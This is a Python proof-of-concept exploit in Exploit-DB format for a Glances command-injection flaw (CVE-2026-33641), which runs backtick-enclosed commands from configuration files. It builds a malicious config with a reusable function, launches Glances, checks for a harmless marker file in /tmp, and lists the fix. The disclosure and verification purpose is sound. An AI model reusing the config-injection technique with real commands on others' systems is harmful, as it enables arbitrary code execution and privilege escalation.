#!/usr/bin/env python3
# Exploit Title: glances 4.5.2 - command injection
# Date: 2026-04-09
# Exploit Author: Stepanov Daniil
# Vendor Homepage: https://github.com/nicolargo/glances
# Software Link: https://github.com/nicolargo/glances
# Version: 4.5.2 and below (fixed in 4.5.3)
# Tested on: Kali Linux 2026.1, Ubuntu 22.04
# CVE: CVE-2026-33641
# CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
'''
Vulnerability Description:
--------------------------
Glances versions prior to 4.5.3 support dynamic configuration values in which
substrings enclosed in backticks are executed as system commands during
configuration parsing. This behavior occurs in Config.get_value() and is
implemented without validation or restriction of the executed commands.
If an attacker can modify or influence configuration files, arbitrary commands
will execute automatically with the privileges of the Glances process during
startup or configuration reload. In deployments where Glances runs with
elevated privileges (e.g., as a system service), this may lead to privilege
escalation.
CVSS Score: 7.8 (HIGH) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Affected component: glances/config.py and glances/globals.py
Credit: Discovered by Stepanov Daniil
'''
import subprocess
import os
import sys
import tempfile
def create_malicious_config(command):
"""
Create a malicious Glances configuration file that executes arbitrary commands.
The vulnerable Config.get_value() method scans for substrings enclosed in
backticks and executes them via system_exec(), which uses subprocess.run()
with shell=False but the backticks are extracted and executed.
Vulnerable code in glances/config.py:
--------------------------------------------------
match = self.re_pattern.findall(ret)
for m in match:
ret = ret.replace(m, system_exec(m[1:-1]))
--------------------------------------------------
Vulnerable code in glances/globals.py:
--------------------------------------------------
def system_exec(command, timeout=5):
res = subprocess.run(command.split(' '), stdout=subprocess.PIPE,
timeout=timeout).stdout.decode('utf-8')
return res
--------------------------------------------------
"""
config_content = f"""
[outputs]
url_prefix = `{command}`
"""
# Create temporary configuration file
config_file = tempfile.NamedTemporaryFile(mode='w', suffix='.conf', delete=False)
config_file.write(config_content)
config_file.close()
return config_file.name
def exploit():
"""
Proof of Concept: Execute arbitrary commands via Glances configuration.
"""
print("[+] CVE-2026-33641 - Glances Command Injection PoC")
print("[+] Exploit Author: Stepanov Daniil")
print()
# Command to execute (create a file in /tmp as proof)
test_file = "/tmp/glances_pwned"
command = f"touch {test_file}"
print(f"[+] Creating malicious config with command: {command}")
config_path = create_malicious_config(command)
print(f"[+] Config file created: {config_path}")
print(f"[+] Launching Glances with malicious config...")
print("[+] If vulnerable, the command will execute during config parsing")
print()
# Execute Glances with the malicious config
# Note: Glances must be installed in the environment
try:
result = subprocess.run(
["glances", "-C", config_path, "--timeout", "2"],
capture_output=True,
text=True,
timeout=5
)
except FileNotFoundError:
print("[!] Error: Glances is not installed or not in PATH")
print("[!] Install with: pip install glances==4.5.2")
sys.exit(1)
except subprocess.TimeoutExpired:
pass # Glances may run indefinitely, that's fine
# Check if the command was executed
print("[+] Checking if command was executed...")
if os.path.exists(test_file):
print(f"[✓] SUCCESS! File created: {test_file}")
print("[✓] Command injection confirmed!")
print("[!] Vulnerability exists in this version of Glances")
os.remove(test_file)
else:
print("[✗] File not found. Either the vulnerability is patched")
print(" or the command could not be executed.")
# Cleanup
os.unlink(config_path)
print(f"\n[+] Cleanup complete: {config_path} removed")
print("\n[+] For more information, visit:")
print(" https://nvd.nist.gov/vuln/detail/CVE-2026-33641")
def manual_verification_guide():
"""
Alternative manual verification method if Glances is not in PATH.
"""
print("\n" + "="*60)
print("MANUAL VERIFICATION GUIDE")
print("="*60)
print("""
If Glances is not installed, you can verify the vulnerability by:
1. Create a file /tmp/malicious.conf with:
[outputs]
url_prefix = `touch /tmp/glances_pwned`
2. Run: glances -C /tmp/malicious.conf
3. Check if /tmp/glances_pwned exists
""")
if __name__ == "__main__":
exploit()
manual_verification_guide()
# Additional notes for Exploit-DB:
# ---------------------------------
# Impact:
# - Arbitrary command execution with privileges of Glances process
# - Often Glances runs with elevated privileges (root/sudo)
# - Can lead to complete system compromise
#
# Fix:
# - Upgrade to Glances version 4.5.3 or higher
# - The dynamic backtick execution feature was completely removed
#
# References:
# - https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7
# - https://github.com/nicolargo/glances/releases/tag/v4.5.3